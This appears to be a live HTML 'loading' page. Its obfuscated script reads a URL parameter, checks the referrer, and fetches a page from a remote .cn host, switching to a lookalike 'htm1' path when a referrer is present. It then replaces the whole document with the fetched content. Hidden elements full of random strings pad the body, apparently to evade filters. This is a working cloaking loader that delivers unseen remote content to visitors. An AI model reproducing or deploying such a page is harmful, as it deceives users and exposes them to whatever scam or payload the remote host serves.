<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oA8ZYR0UA49 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oA8ZYR0UA49 .DM0oUGra {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oA8ZYR0UA49 .content {
            line-height: 50px;
            text-align: center
        }

        .oA8ZYR0UA49 .img {
            width: 100%
        }

        .oA8ZYR0UA49 .azNJ4bJD7U {
            text-align: center
        }

        .oA8ZYR0UA49 .azNJ4bJD7U span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oA8ZYR0UA49 .azNJ4bJD7U span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oA8ZYR0UA49 .azNJ4bJD7U span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oA8ZYR0UA49 .azNJ4bJD7U span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oA8ZYR0UA49 .azNJ4bJD7U span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oA8ZYR0UA49 .azNJ4bJD7U span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oA8ZYR0UA49 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PYHYczM7X(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DCpaUFc = PYHYczM7X('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DCpaUFc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DCpaUFc +".html?a=share";
		}
		
        GEumTNl32f=url+"#"+new Date().getTime();
        GEumTNl32f && function() {
            $.get(GEumTNl32f, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >CcOOfV3ObebgcdiDMfEaTQ7Ims4QQjRw8aGAcwNr9SixmZmUauQARmdtVYfFLUNaDw27mLeFmy</b>
<b style='display:none' >CcOOfV3ObebgcdiDMfEaTQ7Ims4QQjRw8aGAcwNr9SixmZmUauQARmdtVYfFLUNaDw27mLeFmy</b>
<ul style='display:none' >Pt05KIhyiPV015rKai7x0m7</ul>
<img  src='' style='display:none'>
<b style='display:none' >CcOOfV3ObebgcdiDMfEaTQ7Ims4QQjRw8aGAcwNr9SixmZmUauQARmdtVYfFLUNaDw27mLeFmy</b><div class="oA8ZYR0UA49">
    <div class="DM0oUGra">
        <div class="azNJ4bJD7U">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >q3Hlw1DsbwRi7tw8fh4EX</b>
<span style='display:none'>z5S8dZoGZGi0Jct97n7M2SqR5qSoSHZJCCkyuTUiw3GSuYi03z8AVJI02GY7Xk</span>
<p  style='display:none'>IiRy17j4w6n1JIUaiqG8AxtasfSHCeyW94P9</p>
<a  href='#' style='display:none'>tRABAq2GDg6SEy3foKExAAqSy9dlRMEc6xkDycYWG4s3lOQkpmvUfrs</a></body>
</html>